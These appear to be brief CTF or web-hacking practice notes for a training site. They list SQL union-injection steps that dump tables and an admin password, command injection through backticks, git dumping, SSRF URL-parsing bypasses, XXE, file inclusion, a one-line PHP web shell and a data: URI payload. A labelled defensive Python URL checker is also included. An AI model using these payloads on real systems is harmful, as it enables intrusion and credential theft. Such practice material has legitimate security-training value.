8/1
https://bob.rubiya.kr/chall.php
order by 3
There are 3 columns
0 union select 1,2,3
0 union select 1,2,version()
information schema
0 union select 1,2, info from information_schema.processlist
table=> 0 union select 1,2, group_concat(table_name) from information_schema.tables where table_schema=database()
0 union select 1,2, group_concat(column_name) from information_schema.columns where table_name='user'
0 union select id, pw, 1 from user where id='admin'
system("host {input}")
`head -2 index.php`
`grep FLAG index.php`
gitdumper
git log -p
ssrf=>pastebin
?http://a@pastebin.com:80@rubiya.kr/raw/~~~
http://asdf.kr#@rubiya.kr
ssrf bible
A new era of SSRF
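
Added example (not part of the original notes): a defensive check for the two URL shapes noted above, assuming a hypothetical fetcher that is only supposed to reach rubiya.kr. Rather than trusting one parser's idea of the host, it rejects any authority containing characters that URL parsers split differently. `check_url`, `ALLOWED_HOSTS` and `ALLOWED_PORTS` are illustrative names.

```python
from urllib.parse import urlsplit

# Assumption: the only host the server-side fetcher may contact.
ALLOWED_HOSTS = {"rubiya.kr"}
ALLOWED_PORTS = {None, 80, 443}

def check_url(url):
    """Return (allowed, detail). Deliberately strict: anything two URL
    parsers could read differently is rejected, not normalised."""
    # Whitespace and control characters are stripped by some parsers only.
    if any(ord(c) <= 0x20 or ord(c) == 0x7F for c in url):
        return False, "whitespace or control character"
    scheme, sep, rest = url.partition("://")
    if not sep or scheme.lower() not in ("http", "https"):
        return False, "scheme not http/https"
    # Raw authority: everything up to the first '/'. Userinfo ('@'),
    # backslashes and a '#' or '?' glued to the host are where the
    # validating parser and the fetching library tend to disagree.
    raw_authority = rest.split("/", 1)[0]
    if any(c in raw_authority for c in "@\\#?"):
        return False, "ambiguous authority"
    try:
        parts = urlsplit(url)
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return False, "malformed authority"
    host = (parts.hostname or "").rstrip(".")
    if host not in ALLOWED_HOSTS:
        return False, "host not allowlisted"
    if port not in ALLOWED_PORTS:
        return False, "port not allowed"
    return True, host

if __name__ == "__main__":
    # The first two URLs are the ones from the notes; the rest are constructed.
    for u in ("http://a@pastebin.com:80@rubiya.kr/raw/~~~",
              "http://asdf.kr#@rubiya.kr",
              "http://rubiya.kr/raw/abc",
              "http://pastebin.com/raw/abc"):
        print(u, "->", check_url(u))
```

The fetch should then be made against the host this function returned, not against a second parse of the original string.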
Put XXE in data
EXIF tampering tool???
file inclusion no. 3
Files can be included from an external source
<?php
system($_GET['c']);
?>
http://a.rubiya.kr
/payload
?page=data:text/plain,<?php%20system(id)?>;
smarty